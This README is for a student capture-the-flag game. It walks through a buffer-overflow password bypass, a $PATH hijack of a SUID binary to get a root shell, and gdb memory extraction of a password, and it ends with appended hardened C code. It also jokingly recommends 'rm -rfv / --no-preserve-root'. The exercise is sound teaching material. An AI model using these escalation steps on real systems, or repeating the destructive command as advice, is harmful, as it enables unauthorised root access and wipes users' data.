vbuzovsky/IC1_Project
Capture the hack

What is this "game"?

  • This exploit game aims to teach some very basic Linux commands and a little low-level hacking knowledge, which the player uses to collect all the flags.
  • It is also a project for BPC-IC1.

How to play

Initial setup:

  • We recommend doing this in a virtual machine (Manjaro, for example).
  • For compiling, the player needs to know the root password (later on, the player tries to bypass it).
  • Clone this repo and cd into its directory:
git clone https://github.com/PrimalMight/IC1_Project.git
smthn=`find $(pwd) -name 'IC1_Project'` && cd $smthn
  • Compile the totally legit software:
sudo gcc -w -g -fno-stack-protector -o launch_me main.c
sudo gcc -o decryptor decryptor.c
  • And finally, set the SUID bit (needed for the second flag):
sudo chmod u+s launch_me

The names launch_me and decryptor are optional, but I recommend not changing them.

Game tutorial:

Start the program with ./launch_me.

  • First flag: Use a buffer overflow to bypass the initial password check!

    • After the program starts, the player is asked for a password. We don't know the password, so you need to find another way to gain access!
    Hint here!
    Maybe try a run of ``A`` (somewhere between 1 and 35 of them) with ``1`` on the end?
    
    Click me when you really can't find the overflow
    AAAAAAAAAAAAAAAAAAAAAAAAAAAA1 (28x A)
    
  • Second flag: Hijack the $PATH lookup for the program's relative curl call to get a shell and escalate privileges to root!

    • $ strings exploit_this to get information about the compiled file.
    • The program runs $ curl -I localhost: curl is called without a full path, so it is resolved through the $PATH variable!
    • So you need to hijack the curl lookup and substitute a shell for curl.
    Hint here!
    strings launch_me
    echo /usr/bin/sh > /tmp/curl
    #this one is easy: give all permissions to /tmp/curl (use chmod)
    export PATH=/tmp:$PATH
    #cd back to the repo directory
    which curl
    #launch the compiled program with ./launch_me
    #enter the password overflow that worked for the first flag
    #choose ``y`` on "do you want to check for running http localhost service (y/n)"
    #execute the ``whoami`` command to make sure you have root privileges
  • Third flag: Extract the password from memory using gdb and use it to decrypt the riddle_me_this_batman.txt file, which contains the final riddle for Batman!

    • There are two parts the player needs to do.
    • First, create another .txt file and add some text to it with echo (this is needed because it is the Unix way of adding text to a file).
     touch test.txt; echo "We are no strangers to love, You know the rules and so do I!" > test.txt
    • Launch the compiled program with gdb and try to extract the password from memory.
     gdb launch_me
     break <name_of_the_function_player_need_to_break>
    Hint here!
    (in normal console) gdb launch_me
    (in gdb) break encrypt_file
    (in gdb) #answer ``y`` to "Enable debuginfo for this session(y or [n])"
    (in gdb) run
    (in gdb) #enter the "password" from first flag
    (in gdb) #answer ``n`` to "want to check for local service running?"
    (in gdb) #answer ``y`` to "do you want to encrypt file? (y/n)"
    (in gdb) #enter the filename: test.txt (or whatever you chose to name it)
    (in gdb) x/s password #still in the gdb
    (in gdb) exit
    (in gdb) #answer ``y`` to "Quit anyway?(y or n)"
    • The second part is decrypting riddle_me_this_batman.txt.
    • To do that, you need to once again enter a shell with root privileges (second flag) and use the password you found above in the decryptor to decrypt the .txt file.
     ./decryptor
     > please provide a password: <here_goes_the_password>
     nano output_plaintext.txt
    • And now you've got all the flags, so there is one final thing you need to do before you leave this VM image: what is the answer to the riddle?
    • Click me for the answer
    Hint here!
    (normal console) ./launch_me
    > Do you want to check for running http localhost service? (y/n)
     y
    (root from flag2) ./decryptor
    > Please provide a password: <here_goes_the_password>
    (root from flag2) nano output_plaintext.txt
    • And now you can leave with style!

    I recommend using something like rm -rfv / --no-preserve-root

BPC-IC1 things:

Authors: 2x BPC-IBE, 1x BPC-TLI

Vulnerabilities

  • Buffer overflow into password check bypass
  • Relative path hijack into privilege escalation with SUID bit
  • Visible password in memory
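For comparison, here is a hardened counterpart to the three weaknesses listed above, written as an added example for this README (it is not the project's main.c, which is not reproduced here): a bounded password read instead of an overflowable buffer, a comparison without early exit, wiping the password before a debugger can read it with x/s, and invoking curl by absolute path with a fixed environment and dropped SUID privileges so $PATH cannot redirect the call. The path /usr/bin/curl and all function names are assumptions.

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

#define PASS_MAX 32  /* every read into the password buffer is bounded to this */

/* Bounded line read: never writes past buf[size-1], strips the newline and
 * drains any overlong remainder so it cannot spill into the next prompt. */
int read_line_bounded(char *buf, size_t size, FILE *in) {
    if (size == 0 || fgets(buf, (int)size, in) == NULL) return -1;
    size_t n = strlen(buf);
    if (n > 0 && buf[n - 1] == '\n') buf[n - 1] = '\0';
    else { int c; while ((c = fgetc(in)) != EOF && c != '\n') {} }
    return 0;
}

/* Compare without early exit, so timing does not reveal matching prefixes. */
int password_matches(const char *supplied, const char *expected) {
    size_t ls = strlen(supplied), le = strlen(expected);
    unsigned char diff = (unsigned char)(ls ^ le);
    for (size_t i = 0; i < le; i++)
        diff |= (unsigned char)(supplied[i < ls ? i : 0] ^ expected[i]);
    return diff == 0;
}

/* Overwrite a secret so a later `x/s` in a debugger finds only zeros; the
 * volatile pointer stops the compiler from dropping the "dead" stores. */
void wipe_secret(char *buf, size_t size) {
    volatile char *p = buf;
    while (size--) *p++ = 0;
}

/* Run curl by absolute path (assumed /usr/bin/curl), with a fixed environment
 * and the caller's real (not SUID) credentials, so a caller-controlled $PATH
 * cannot swap in another binary and would gain nothing if it did. */
int run_curl_head(const char *host) {
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        if (setgid(getgid()) != 0 || setuid(getuid()) != 0) _exit(126);
        char *const argv[] = {"/usr/bin/curl", "-I", (char *)host, NULL};
        char *const envp[] = {"PATH=/usr/bin:/bin", NULL};
        execve(argv[0], argv, envp);  /* no PATH lookup happens here */
        _exit(127);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;  /* curl's exit code */
}
```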
